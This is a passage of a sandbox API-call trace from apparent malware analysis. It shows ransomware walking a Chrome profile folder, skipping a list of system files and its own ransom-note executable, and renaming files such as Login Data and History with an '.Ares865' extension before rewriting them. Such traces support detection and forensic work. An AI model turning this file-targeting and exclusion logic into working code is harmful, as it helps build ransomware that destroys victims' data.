Settings\\Google\\Chrome\\User Data\\Default\\Favicons.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\favicons.ares865"), dwFlags=0x1) returned 1 [0099.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Favicons.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\favicons.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.774] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20480) returned 1 [0099.777] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Favicons-journal.Ares865") returned 101 [0099.778] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Favicons-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\favicons-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Favicons-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\favicons-journal.ares865"), dwFlags=0x1) returned 1 [0099.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Favicons-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\favicons-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.779] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.779] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.779] CloseHandle (hObject=0x0) returned 0 [0099.779] CloseHandle (hObject=0x118) returned 1 [0099.779] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81c321d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81c321d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81c58330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2b2e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google Profile.ico", cAlternateFileName="GOOGLE~1.ICO")) returned 1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2="aoldtz.exe") returned 1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2=".") returned 1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2="..") returned 1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2="windows") returned -1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2="bootmgr") returned 1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2="temp") returned -1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2="pagefile.sys") returned -1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2="boot") returned 1 [0099.779] lstrcmpiW (lpString1="Google Profile.ico", lpString2="ids.txt") returned -1 [0099.780] lstrcmpiW (lpString1="Google Profile.ico", lpString2="ntuser.dat") returned -1 [0099.780] lstrcmpiW (lpString1="Google Profile.ico", lpString2="perflogs") returned -1 [0099.780] lstrcmpiW (lpString1="Google Profile.ico", lpString2="MSBuild") returned -1 [0099.780] lstrlenW (lpString="Google Profile.ico") returned 18 [0099.780] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Favicons-journal") returned 93 [0099.780] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Google Profile.ico" | out: lpString1="Google Profile.ico") returned="Google Profile.ico" [0099.780] lstrlenW (lpString="Google Profile.ico") returned 18 [0099.780] lstrlenW (lpString="Ares865") returned 7 [0099.780] lstrcmpiW (lpString1="ile.ico", lpString2="Ares865") returned 1 [0099.780] lstrlenW (lpString=".dll") returned 4 [0099.780] lstrcmpiW (lpString1="Google Profile.ico", lpString2=".dll") returned 1 [0099.780] lstrlenW (lpString=".lnk") returned 4 [0099.780] lstrcmpiW (lpString1="Google Profile.ico", lpString2=".lnk") returned 1 [0099.780] lstrlenW (lpString=".ini") returned 4 [0099.780] lstrcmpiW (lpString1="Google Profile.ico", lpString2=".ini") returned 1 [0099.780] lstrlenW (lpString=".sys") returned 4 [0099.780] lstrcmpiW (lpString1="Google Profile.ico", lpString2=".sys") returned 1 [0099.780] lstrlenW (lpString="Google Profile.ico") returned 18 [0099.780] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.Ares865") returned 103 [0099.780] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\google profile.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\google profile.ico.ares865"), dwFlags=0x1) returned 1 [0099.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\google profile.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.782] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=176873) returned 1 [0099.794] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History.Ares865") returned 92 [0099.794] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\history"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\history.ares865"), dwFlags=0x1) returned 1 [0099.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\history.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.796] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=102400) returned 1 [0099.823] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History Provider Cache.Ares865") returned 107 [0099.823] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History Provider Cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\history provider cache"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History Provider Cache.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\history provider cache.ares865"), dwFlags=0x1) returned 1 [0099.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History Provider Cache.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\history provider cache.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.825] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5167) returned 1 [0099.828] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History-journal.Ares865") returned 100 [0099.828] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\history-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\history-journal.ares865"), dwFlags=0x1) returned 1 [0099.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\history-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.830] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.830] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.830] CloseHandle (hObject=0x0) returned 0 [0099.830] CloseHandle (hObject=0x118) returned 1 [0099.830] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4de297c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4de297c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0099.830] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0099.830] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x96ec4eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dee7ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dee7ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JumpListIcons", cAlternateFileName="JUMPLI~2")) returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="aoldtz.exe") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2=".") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="..") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="windows") returned -1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="bootmgr") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="temp") returned -1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="pagefile.sys") returned -1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="boot") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="ids.txt") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="ntuser.dat") returned -1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="perflogs") returned -1 [0099.830] lstrcmpiW (lpString1="JumpListIcons", lpString2="MSBuild") returned -1 [0099.830] lstrlenW (lpString="JumpListIcons") returned 13 [0099.830] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\History-journal") returned 92 [0099.830] lstrcpyW (in: lpString1=0x2cce49a, lpString2="JumpListIcons" | out: lpString1="JumpListIcons") returned="JumpListIcons" [0099.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0099.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x2f2fc8 [0099.830] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0099.830] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85096390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dee7ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dee7ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JumpListIconsOld", cAlternateFileName="JUMPLI~1")) returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="aoldtz.exe") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIconsOld", lpString2=".") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="..") returned 1 [0099.830] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="windows") returned -1 [0099.831] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="bootmgr") returned 1 [0099.831] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="temp") returned -1 [0099.831] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="pagefile.sys") returned -1 [0099.831] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="boot") returned 1 [0099.831] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="ids.txt") returned 1 [0099.831] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="ntuser.dat") returned -1 [0099.831] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="perflogs") returned -1 [0099.831] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="MSBuild") returned -1 [0099.831] lstrlenW (lpString="JumpListIconsOld") returned 16 [0099.831] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIcons") returned 90 [0099.831] lstrcpyW (in: lpString1=0x2cce49a, lpString2="JumpListIconsOld" | out: lpString1="JumpListIconsOld") returned="JumpListIconsOld" [0099.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0099.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2d0000 [0099.831] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0099.831] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8642cdf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dec1d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dec1d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Extension Settings", cAlternateFileName="LOCALE~1")) returned 1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="aoldtz.exe") returned 1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2=".") returned 1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="..") returned 1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="windows") returned -1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="bootmgr") returned 1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="temp") returned -1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="pagefile.sys") returned -1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="boot") returned 1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="ids.txt") returned 1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="ntuser.dat") returned -1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="perflogs") returned -1 [0099.831] lstrcmpiW (lpString1="Local Extension Settings", lpString2="MSBuild") returned -1 [0099.831] lstrlenW (lpString="Local Extension Settings") returned 24 [0099.831] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld") returned 93 [0099.831] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Local Extension Settings" | out: lpString1="Local Extension Settings") returned="Local Extension Settings" [0099.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0099.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xcc) returned 0x2d40a8 [0099.831] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0099.831] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83ede170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dec1d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dec1d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Storage", cAlternateFileName="LOCALS~1")) returned 1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="aoldtz.exe") returned 1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2=".") returned 1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="..") returned 1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="windows") returned -1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="bootmgr") returned 1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="temp") returned -1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="pagefile.sys") returned -1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="boot") returned 1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="ids.txt") returned 1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="ntuser.dat") returned -1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="perflogs") returned -1 [0099.832] lstrcmpiW (lpString1="Local Storage", lpString2="MSBuild") returned -1 [0099.832] lstrlenW (lpString="Local Storage") returned 13 [0099.832] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Extension Settings") returned 101 [0099.832] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Local Storage" | out: lpString1="Local Storage") returned="Local Storage" [0099.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0099.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x2f3088 [0099.832] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0099.832] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80fc7e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80fc7e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8124f5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Login Data", cAlternateFileName="LOGIND~1")) returned 1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="aoldtz.exe") returned 1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2=".") returned 1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="..") returned 1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="windows") returned -1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="bootmgr") returned 1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="temp") returned -1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="pagefile.sys") returned -1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="boot") returned 1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="ids.txt") returned 1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="ntuser.dat") returned -1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="perflogs") returned -1 [0099.832] lstrcmpiW (lpString1="Login Data", lpString2="MSBuild") returned -1 [0099.832] lstrlenW (lpString="Login Data") returned 10 [0099.832] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Local Storage") returned 90 [0099.832] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Login Data" | out: lpString1="Login Data") returned="Login Data" [0099.833] lstrlenW (lpString="Login Data") returned 10 [0099.833] lstrlenW (lpString="Ares865") returned 7 [0099.833] lstrcmpiW (lpString1="in Data", lpString2="Ares865") returned 1 [0099.833] lstrlenW (lpString=".dll") returned 4 [0099.833] lstrcmpiW (lpString1="Login Data", lpString2=".dll") returned 1 [0099.833] lstrlenW (lpString=".lnk") returned 4 [0099.833] lstrcmpiW (lpString1="Login Data", lpString2=".lnk") returned 1 [0099.833] lstrlenW (lpString=".ini") returned 4 [0099.833] lstrcmpiW (lpString1="Login Data", lpString2=".ini") returned 1 [0099.833] lstrlenW (lpString=".sys") returned 4 [0099.833] lstrcmpiW (lpString1="Login Data", lpString2=".sys") returned 1 [0099.833] lstrlenW (lpString="Login Data") returned 10 [0099.833] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Login Data.Ares865") returned 95 [0099.833] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\login data"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Login Data.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\login data.ares865"), dwFlags=0x1) returned 1 [0099.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Login Data.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\login data.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.835] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18432) returned 1 [0099.844] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Login Data-journal.Ares865") returned 103 [0099.844] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\login data-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Login Data-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\login data-journal.ares865"), dwFlags=0x1) returned 1 [0099.845] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Login Data-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\login data-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.845] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.846] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.846] CloseHandle (hObject=0x0) returned 0 [0099.846] CloseHandle (hObject=0x118) returned 1 [0099.846] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82330270, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82330270, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x825f0410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Network Action Predictor", cAlternateFileName="NETWOR~1")) returned 1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="aoldtz.exe") returned 1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2=".") returned 1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="..") returned 1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="windows") returned -1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="bootmgr") returned 1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="temp") returned -1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="pagefile.sys") returned -1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="boot") returned 1 [0099.846] lstrcmpiW (lpString1="Network Action 